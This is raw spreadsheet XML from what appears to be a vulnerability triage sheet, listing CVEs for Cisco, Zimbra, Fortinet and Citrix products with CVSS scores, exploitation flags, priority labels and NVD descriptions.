    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3330" r:id="rId3329"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3331" r:id="rId3330"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3332" r:id="rId3331"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3333" r:id="rId3332"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3334" r:id="rId3333"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3335" r:id="rId3334"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3336" r:id="rId3335"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3337" r:id="rId3336"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3338" r:id="rId3337"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3339" r:id="rId3338"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3340" r:id="rId3339"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3341" r:id="rId3340"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3342" r:id="rId3341"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3343" r:id="rId3342"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3344" r:id="rId3343"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3345" r:id="rId3344"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3346" r:id="rId3345"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3347" r:id="rId3346"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3348" r:id="rId3347"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3349" r:id="rId3348"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3350" r:id="rId3349"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3351" r:id="rId3350"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3352" r:id="rId3351"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3353" r:id="rId3352"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3354" r:id="rId3353"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3355" r:id="rId3354"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3356" r:id="rId3355"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3357" r:id="rId3356"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3358" r:id="rId3357"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3359" r:id="rId3358"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3360" r:id="rId3359"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3361" r:id="rId3360"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3362" r:id="rId3361"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3363" r:id="rId3362"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3364" r:id="rId3363"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3365" r:id="rId3364"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3366" r:id="rId3365"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3367" r:id="rId3366"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3368" r:id="rId3367"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3369" r:id="rId3368"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3370" r:id="rId3369"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3371" r:id="rId3370"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3372" r:id="rId3371"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3373" r:id="rId3372"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3374" r:id="rId3373"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3375" r:id="rId3374"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3376" r:id="rId3375"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3377" r:id="rId3376"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3378" r:id="rId3377"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3379" r:id="rId3378"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3380" r:id="rId3379"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3381" r:id="rId3380"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3382" r:id="rId3381"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3383" r:id="rId3382"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3384" r:id="rId3383"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3385" r:id="rId3384"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3386" r:id="rId3385"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3387" r:id="rId3386"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3388" r:id="rId3387"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3389" r:id="rId3388"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3390" r:id="rId3389"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3391" r:id="rId3390"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3392" r:id="rId3391"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3393" r:id="rId3392"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3394" r:id="rId3393"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3395" r:id="rId3394"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3396" r:id="rId3395"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3397" r:id="rId3396"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3398" r:id="rId3397"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3399" r:id="rId3398"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3400" r:id="rId3399"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3401" r:id="rId3400"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3402" r:id="rId3401"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3403" r:id="rId3402"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3404" r:id="rId3403"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3405" r:id="rId3404"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3406" r:id="rId3405"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3407" r:id="rId3406"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3408" r:id="rId3407"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3409" r:id="rId3408"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3410" r:id="rId3409"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3411" r:id="rId3410"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3412" r:id="rId3411"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3413" r:id="rId3412"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3414" r:id="rId3413"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3415" r:id="rId3414"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3416" r:id="rId3415"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3417" r:id="rId3416"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3418" r:id="rId3417"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3419" r:id="rId3418"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3420" r:id="rId3419"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3421" r:id="rId3420"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3422" r:id="rId3421"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3423" r:id="rId3422"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3424" r:id="rId3423"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3425" r:id="rId3424"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3426" r:id="rId3425"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3427" r:id="rId3426"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3428" r:id="rId3427"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3429" r:id="rId3428"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3430" r:id="rId3429"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3431" r:id="rId3430"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3432" r:id="rId3431"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3433" r:id="rId3432"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3434" r:id="rId3433"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3435" r:id="rId3434"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3436" r:id="rId3435"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3437" r:id="rId3436"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3438" r:id="rId3437"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3439" r:id="rId3438"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3440" r:id="rId3439"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3441" r:id="rId3440"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3442" r:id="rId3441"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3443" r:id="rId3442"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3444" r:id="rId3443"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3445" r:id="rId3444"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3446" r:id="rId3445"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3447" r:id="rId3446"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3448" r:id="rId3447"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3449" r:id="rId3448"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3450" r:id="rId3449"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3451" r:id="rId3450"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3452" r:id="rId3451"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3453" r:id="rId3452"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3454" r:id="rId3453"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3455" r:id="rId3454"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3456" r:id="rId3455"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3457" r:id="rId3456"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3458" r:id="rId3457"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3459" r:id="rId3458"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3460" r:id="rId3459"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3461" r:id="rId3460"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3462" r:id="rId3461"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3463" r:id="rId3462"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3464" r:id="rId3463"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3465" r:id="rId3464"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3466" r:id="rId3465"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3467" r:id="rId3466"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3468" r:id="rId3467"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3469" r:id="rId3468"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3470" r:id="rId3469"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3471" r:id="rId3470"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3472" r:id="rId3471"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3473" r:id="rId3472"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3474" r:id="rId3473"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3475" r:id="rId3474"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3476" r:id="rId3475"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3477" r:id="rId3476"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3478" r:id="rId3477"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3479" r:id="rId3478"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3480" r:id="rId3479"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3481" r:id="rId3480"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3482" r:id="rId3481"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3483" r:id="rId3482"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3484" r:id="rId3483"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3485" r:id="rId3484"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3486" r:id="rId3485"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3487" r:id="rId3486"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3488" r:id="rId3487"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3489" r:id="rId3488"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3490" r:id="rId3489"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3491" r:id="rId3490"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3492" r:id="rId3491"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3493" r:id="rId3492"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3494" r:id="rId3493"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3495" r:id="rId3494"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3496" r:id="rId3495"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3497" r:id="rId3496"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3498" r:id="rId3497"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3499" r:id="rId3498"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3500" r:id="rId3499"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3501" r:id="rId3500"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3502" r:id="rId3501"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3503" r:id="rId3502"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3504" r:id="rId3503"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3505" r:id="rId3504"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3506" r:id="rId3505"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3507" r:id="rId3506"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3508" r:id="rId3507"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3509" r:id="rId3508"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3510" r:id="rId3509"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3511" r:id="rId3510"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3512" r:id="rId3511"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3513" r:id="rId3512"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3514" r:id="rId3513"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3515" r:id="rId3514"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3516" r:id="rId3515"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3517" r:id="rId3516"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3518" r:id="rId3517"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3519" r:id="rId3518"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3520" r:id="rId3519"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3521" r:id="rId3520"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3522" r:id="rId3521"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3523" r:id="rId3522"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3524" r:id="rId3523"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3525" r:id="rId3524"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3526" r:id="rId3525"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3527" r:id="rId3526"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M3528" r:id="rId352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3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CVE-2026-20079</t>
        </is>
      </c>
      <c r="C2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F2" s="5" t="n">
        <v>0.747</v>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr">
        <is>
          <t>cisco:secure_firewall_management_center</t>
        </is>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>2026-03-04</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.&amp;nbsp;
This vulnerability is due to an improper system process that is created at boot time. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute a variety of scripts and commands that allow&amp;nbsp;root access to the device.&amp;nbsp;</t>
        </is>
      </c>
      <c r="M2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-41352</t>
        </is>
      </c>
      <c r="C3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F3" s="5" t="n">
        <v>0.955</v>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>red hat, ubuntu</t>
        </is>
      </c>
      <c r="H3" s="5" t="inlineStr">
        <is>
          <t>synacor:zimbra_collaboration_suite</t>
        </is>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>2022-09-26</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>2022-11-10</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.</t>
        </is>
      </c>
      <c r="M3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-41352</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="C4" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F4" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H4" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios, fortinet:fortisase, fortinet:fortiswitchmanager, siemens:ruggedcom_ape1808, siemens:ruggedcom_ape1808_firmware</t>
        </is>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>2026-01-13</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows attacker to execute unauthorized code or commands via specially crafted packets</t>
        </is>
      </c>
      <c r="M4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="C5" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F5" s="5" t="n">
        <v>0.06</v>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
